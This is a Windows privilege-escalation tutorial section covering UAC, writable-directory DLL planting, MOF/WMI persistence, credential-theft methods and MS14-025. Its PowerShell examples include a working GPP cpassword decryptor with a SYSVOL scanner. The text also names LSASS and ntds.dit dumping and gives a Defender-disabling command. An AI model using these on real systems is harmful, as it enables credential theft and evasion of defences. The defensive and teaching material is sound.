6.1.3. Privilege

6.1.3.1. UAC

6.1.3.1.1. Introduction

UAC (User Account Control) is a security mechanism introduced with Windows Vista and Windows Server 2008. When a sensitive operation is requested, Windows shows a consent or credential prompt and only then lets the operation run with full administrator rights.

When a user logs on to Windows, the logon session receives an access token that carries the user's security identifier (SID), the SIDs of the groups the user belongs to, the user's privileges and an integrity level; this token is what determines the user's authority. With UAC enabled, a member of the Administrators group actually receives two tokens: a filtered token, in which the Administrators group is marked "deny only" and the administrative privileges are stripped, and a full token. Ordinary programs run with the filtered token at medium integrity; elevating through the UAC prompt starts the program with the full token at high integrity.
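The following is an added example (not code from the original page) that makes the token split visible: it reads the UAC policy values from the registry and asks the kernel which of the two token types the current PowerShell process holds. It assumes a Windows host with PowerShell 5.1 or later and uses only Win32 APIs through P/Invoke; it changes nothing on the system.

```powershell
# Added example, not from the original page: show the UAC policy and what kind of token the
# current process holds. Assumes a Windows host with PowerShell 5.1 or later; read-only.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TokenInfo {
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool GetTokenInformation(IntPtr token, int infoClass, out int info, int len, out int returned);
    // TOKEN_QUERY = 0x0008, TokenElevationType = 18.
    // Result: 1 = default (no linked token), 2 = full (elevated), 3 = limited (filtered).
    public static int ElevationType() {
        IntPtr token; int value, returned;
        if (!OpenProcessToken(GetCurrentProcess(), 0x0008, out token))
            throw new Exception("OpenProcessToken failed: " + Marshal.GetLastWin32Error());
        try {
            if (!GetTokenInformation(token, 18, out value, sizeof(int), out returned))
                throw new Exception("GetTokenInformation failed: " + Marshal.GetLastWin32Error());
        } finally { CloseHandle(token); }
        return value;
    }
}
'@

# UAC policy as stored in the registry (Group Policy writes the same values).
$policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
[pscustomobject]@{
    EnableLUA                  = $policy.EnableLUA                  # 0 = UAC disabled entirely
    ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin # 0 = elevate silently, 5 = default prompt
    ConsentPromptBehaviorUser  = $policy.ConsentPromptBehaviorUser  # 0 = standard users cannot elevate at all
    PromptOnSecureDesktop      = $policy.PromptOnSecureDesktop      # 1 = prompt on the secure desktop
} | Format-List

# Token classification: an administrator who has not elevated holds the "limited" token, in which
# the Administrators group is deny-only, so IsInRole(Administrator) is false and the integrity
# label is Medium (S-1-16-8192) rather than High (S-1-16-12288).
$elevation = switch ([TokenInfo]::ElevationType()) {
    1 { 'Default: no linked token (standard user, UAC off, or built-in Administrator)' }
    2 { 'Full: elevated administrator token' }
    3 { 'Limited: filtered token, Administrators group present as deny-only' }
}
$principal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
$label = (whoami /groups | Select-String 'S-1-16-\d+' | Select-Object -First 1).Matches[0].Value
[pscustomobject]@{
    ElevationType   = $elevation
    IsAdministrator = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    IntegrityLevel  = $label
} | Format-List
```

Run it twice, once from a normal PowerShell window and once from one started with "Run as administrator", and the same account reports type 3 with IsAdministrator false in the first case and type 2 with IsAdministrator true in the second; a standard user or a host with EnableLUA = 0 reports type 1. The integrity SID is matched by pattern rather than by the "Mandatory Label" text so the check also works on non-English installations.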

6.1.3.1.2. Actions that will trigger UAC

  • Starting an application with administrator privileges ("Run as administrator")

  • Changing system or UAC settings

  • Modifying files or directories the user has no write permission to (for example %SystemRoot% or %ProgramFiles%)

  • Modifying an ACL (access control list)

  • Installing a driver

  • Adding or deleting accounts, changing account types, enabling the Guest account

6.1.3.1.3. Bypass

  • DLL related (planting a DLL that a signed, auto-elevating binary loads)

  • Process injection (running code inside a process that already holds an elevated token)

  • Registry (hijacking a registry key, typically under the user-writable HKCU hive, that an auto-elevating binary consults before it runs a command)

6.1.3.2. Privilege Escalation

There are multiple ways to escalate privileges, broadly divided into exploiting memory-corruption vulnerabilities and exploiting logic flaws. The memory-corruption route executes code in kernel mode, for example through a use-after-free in the kernel, in a driver or in a similar component, and uses that to obtain higher privileges.

Logic flaws exploit mistakes in how the system is put together. A typical example is a directory that ordinary users can write to but whose contents are later loaded or executed with administrator or SYSTEM privileges.

6.1.3.2.1. Arbitrary file write exploitation

The sensitive locations that users can write to in Windows are mainly the following:

  • The user's own files and directories, including AppData and Temp

  • C:\ itself: by default authenticated users can create subdirectories there (but not files directly in the root)

  • Subdirectories of C:\ProgramData: users can create folders and write files by default

  • Subdirectories of C:\Windows\Temp: users can create folders and write files by default

The exact ACLs can be inspected with Sysinternals AccessChk or with PowerShell's Get-Acl.

Write permission on these directories and their subdirectories lets an attacker plant a DLL in a location from which a privileged process may load it; when that DLL is loaded, the attacker's code runs with the privileges of the loading process.
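The following added example (not code from the original page) performs the Get-Acl check described above for the directories just listed and their immediate subdirectories, reporting which ones the current token can create files or folders in. It assumes Windows with PowerShell 5.1 or later, is read-only, and can be run as a standard user.

```powershell
# Added example, not part of the original page: enumerate which of the directories named above
# (and their immediate subdirectories) the current token can create files or folders in.
# Assumes Windows with PowerShell 5.1 or later; read-only.
function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    # SIDs the token carries. Deny-only groups of a filtered administrator token are not listed
    # in .Groups; they only matter for Deny ACEs, so an un-elevated admin may see a few extra hits.
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # Bits that grant writing: CreateFiles (0x2), CreateDirectories (0x4), GENERIC_WRITE
    # (0x40000000), GENERIC_ALL (0x10000000). FileSystemRights may carry generic bits as a
    # negative Int32, which is why the mask is applied to [int] rather than to the enum.
    $writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000
    $allowed = 0; $denied = 0
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.GetAccessRules($true, $true, [Security.Principal.SecurityIdentifier])) {
        if ($sids -notcontains $ace.IdentityReference.Value) { continue }
        # PropagationFlags InheritOnly (2): the ACE applies to children only, not to $Path itself.
        # This is what makes C:\ special: Authenticated Users get Modify on subfolders and files
        # (inherit-only) but only CreateDirectories on the root itself.
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }
        $bits = [int]$ace.FileSystemRights -band $writeMask
        if ($bits -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { $denied = $denied -bor $bits }
        else { $allowed = $allowed -bor $bits }
    }
    # A Deny ACE wins over an Allow ACE for the same bit.
    $effective = $allowed -band (-bnot $denied)
    $generic = 0x40000000 -bor 0x10000000
    [pscustomobject]@{
        Path           = $Path
        CanCreateFiles = ($effective -band (0x2 -bor $generic)) -ne 0
        CanCreateDirs  = ($effective -band (0x4 -bor $generic)) -ne 0
    }
}

$roots = 'C:\', 'C:\ProgramData', 'C:\Windows\Temp'
$targets = foreach ($root in $roots) {
    $root
    Get-ChildItem -LiteralPath $root -Directory -Force -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName }
}
$targets | ForEach-Object { Test-WritableByCurrentUser -Path $_ } |
    Where-Object { $_ -and ($_.CanCreateFiles -or $_.CanCreateDirs) } |
    Format-Table -AutoSize
```

On a default installation C:\ shows up with CanCreateDirs true and CanCreateFiles false, which is the root-directory nuance in the list above; subdirectories of C:\ProgramData that an installer created with a loose ACL are the interesting hits. The function only evaluates the ACL of the directory itself, so a directory it reports as writable still has to be checked for whether anything privileged actually loads from it.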

6.1.3.2.2. MOF

MOF (Managed Object Format) is the text format WMI uses to define classes and instances; a MOF file is compiled into the WMI repository with mofcomp. The classic privilege escalation drops a MOF file, conventionally named nullevt.mof, into c:/windows/system32/wbem/mof/. On Windows XP and Windows Server 2003 the WMI service automatically compiles any MOF file placed in that directory and registers whatever it defines, with the WMI service's SYSTEM privileges; later Windows versions no longer auto-compile that directory, so the technique only applies to those older systems.

When you can write files to the target but have no shell, write a crafted MOF file to that directory; after a short delay the WMI service compiles it and the payload it defines runs.

The payload is usually a permanent WMI event subscription: an __EventFilter whose WQL query polls for an event at a short interval (this polling is where the often quoted "every five seconds" description comes from), bound to an ActiveScriptEventConsumer carrying a VBScript that runs net user to create an account and add it to the Administrators group. Because the consumer's script runs as SYSTEM, a new administrator account is obtained.
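The three objects that such a MOF registers (a filter, a consumer and the binding between them) survive reboots in the WMI repository, so the practical check for this technique is to enumerate them. The following is an added example (not code from the original page) that lists every permanent subscription in the root/subscription namespace with the consumer's payload, plus a helper to remove one. It assumes Windows with PowerShell 5.1 or later, run as an administrator; the listing is read-only and the removal helper is not called.

```powershell
# Added example, not from the original page: list the permanent WMI event subscriptions that a
# planted MOF registers (an __EventFilter, an event consumer, and the __FilterToConsumerBinding
# that ties them together) and show each consumer's payload. Assumes Windows with PowerShell
# 5.1 or later, run as administrator. Read-only; Remove-WmiSubscription is defined but not called.
$ns = 'root/subscription'

# Querying the abstract base class returns every concrete consumer type
# (ActiveScriptEventConsumer, CommandLineEventConsumer, ...).
$consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

foreach ($b in $bindings) {
    # Filter and Consumer are object references; their key property is Name.
    $filter   = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
    $consumer = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
    $payload = switch ($consumer.CimClass.CimClassName) {
        'ActiveScriptEventConsumer' {
            # Inline script (ScriptText) or a script file on disk (ScriptFileName).
            if ($consumer.ScriptText) { "$($consumer.ScriptingEngine): $($consumer.ScriptText)" }
            else { "$($consumer.ScriptingEngine) file: $($consumer.ScriptFileName)" }
        }
        'CommandLineEventConsumer' { "cmd: $($consumer.ExecutablePath) $($consumer.CommandLineTemplate)" }
        default { "($($consumer.CimClass.CimClassName))" }
    }
    [pscustomobject]@{
        Filter   = $filter.Name
        Query    = $filter.Query      # the WQL event the payload waits for (timer, process creation, ...)
        Consumer = $consumer.Name
        Payload  = $payload
    }
}

# Cleanup helper: deleting the binding stops execution; the filter and consumer are then inert
# and are removed as well so they cannot be re-bound.
function Remove-WmiSubscription {
    param([Parameter(Mandatory)][string]$FilterName, [Parameter(Mandatory)][string]$ConsumerName)
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $FilterName -and $_.Consumer.Name -eq $ConsumerName } |
        Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   | Where-Object Name -eq $FilterName   | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer | Where-Object Name -eq $ConsumerName | Remove-CimInstance
}
```

A clean system normally shows at most the SCM event-log consumer that Windows itself registers; a binding whose consumer carries a VBScript or JScript that calls net user, or a command line that launches a shell, is exactly what the MOF described above leaves behind. The same listing is also the right place to look on modern Windows, where the MOF is no longer auto-compiled but an attacker who already has administrator rights can register the identical subscription with mofcomp for persistence.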

6.1.3.2.3. Credential theft

  • Windows native password hash export tools

  • Windows native password cracking tools
    • L0phtCrack

    • SAMInside

    • Ophcrack

  • Rainbow-table cracking

  • Dumping hashes and plaintext passwords from the local machine's LSASS memory

  • Plaintext capture on Windows 8 / Server 2012 and later (WDigest plaintext caching is off by default from Windows 8.1 / Server 2012 R2 and on systems with KB2871997; LSASS only holds plaintext again if UseLogonCredential is set to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest)

  • Export ntds.dit (together with the SYSTEM hive, which holds the boot key needed to decrypt it) and parse it with QuarksPwDump

  • vssown.vbs + libesedb + NtdsXtract (copy ntds.dit out of a volume shadow copy, since the live file is locked, then parse it offline)

  • ntdsdump

  • Parse the hashes with PowerShell (the DSInternals module)

  • Password guessing against the local machine with net use \\%computername% /u:%username% (the command prompts for the password and fails if it is wrong, so it validates a guess without a lockout-prone remote logon)

  • When LSASS memory cannot be read directly, crash the operating system and read the credentials from the resulting crash dump (a complete or kernel memory dump must be configured for this to work)

6.1.3.2.4. Other

  • Group Policy Preferences vulnerability (MS14-025: passwords set through GPP are stored in SYSVOL XML files as a cpassword attribute, encrypted with an AES key that Microsoft published, so any domain user who can read SYSVOL can decrypt them)

  • DLL hijacking

  • Replacing system tools with backdoored copies

  • Disabling Defender
    • Set-MpPreference -DisableRealtimeMonitoring $true (requires administrator rights; with Tamper Protection enabled the change is refused, and disabling real-time protection is recorded as event ID 5001 in the Microsoft-Windows-Windows Defender/Operational log)
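The Group Policy Preferences item above is concrete enough to demonstrate end to end. The following is an added example (not code from the original page) that decrypts a cpassword value with the published key and scans SYSVOL for files that carry one. It assumes Windows PowerShell 5.1 or later; the SYSVOL scan only runs on a domain-joined host, and the sample cpassword is a value widely reproduced in MS14-025 write-ups, used here purely as input.

```powershell
# Added example, not from the original page: decrypt a Group Policy Preferences "cpassword"
# value (MS14-025). The 32-byte AES key is the one Microsoft published in the GPP documentation,
# which is why any domain user who can read SYSVOL can recover these passwords.
function ConvertFrom-GPPCPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips Base64 padding; restore it the same way Get-GPPPassword does.
    switch ($CPassword.Length % 4) {
        1 { $CPassword = $CPassword.Substring(0, $CPassword.Length - 1) }
        2 { $CPassword += '==' }
        3 { $CPassword += '=' }
    }
    $cipher = [Convert]::FromBase64String($CPassword)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    # Published key; the IV is sixteen zero bytes.
    $aes.Key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                        0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    $aes.IV  = New-Object byte[] 16
    $decryptor = $aes.CreateDecryptor()
    try { $plain = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $decryptor.Dispose(); $aes.Dispose() }
    # GPP stores the password as UTF-16LE.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

# Files in SYSVOL that can carry a cpassword attribute; the XPath finds it regardless of which
# preference type (local user, service, scheduled task, data source, drive map) produced it.
function Find-GPPPassword {
    param([string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    $files = Get-ChildItem -Path $SysvolPath -Recurse -Include $names -ErrorAction SilentlyContinue
    foreach ($file in $files) {
        [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            # The account attribute differs per preference type.
            $account = $node.userName
            if (-not $account) { $account = $node.accountName }
            if (-not $account) { $account = $node.runAs }
            if (-not $account) { $account = $node.name }
            [pscustomobject]@{
                File     = $file.FullName
                Account  = $account
                Password = ConvertFrom-GPPCPassword -CPassword $node.cpassword
            }
        }
    }
}

# Sample cpassword value widely reproduced in MS14-025 write-ups, used here only as sample input.
ConvertFrom-GPPCPassword -CPassword 'j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw'
if ($env:USERDNSDOMAIN) { Find-GPPPassword | Format-Table -AutoSize }
```

The patch for MS14-025 only stops Group Policy Preferences from creating new cpassword values; it does not remove existing ones from SYSVOL, so the scan is worth running on domains that were patched years ago. Any hit should be treated as a compromised credential and the preference item deleted, not merely re-set.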